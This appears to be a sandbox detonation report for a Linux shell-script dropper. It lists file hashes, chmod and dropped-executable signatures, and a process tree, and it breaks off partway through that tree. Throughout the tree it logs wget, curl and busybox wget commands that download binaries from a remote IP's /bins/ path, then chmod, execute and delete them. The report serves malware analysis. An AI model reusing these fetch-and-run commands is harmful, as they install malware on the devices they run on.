US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/821-1-0xb6728000-0xb6739044-memory.dmp

memory/841-2-0xb6791000-0xb67a2044-memory.dmp

memory/871-3-0xb670e000-0xb671f044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 01:07

Reported

2024-11-10 01:09

Platform

debian9-mipsbe-20240729-en

Max time kernel

63s

Max time network

65s

Command Line

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A

Processes

/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

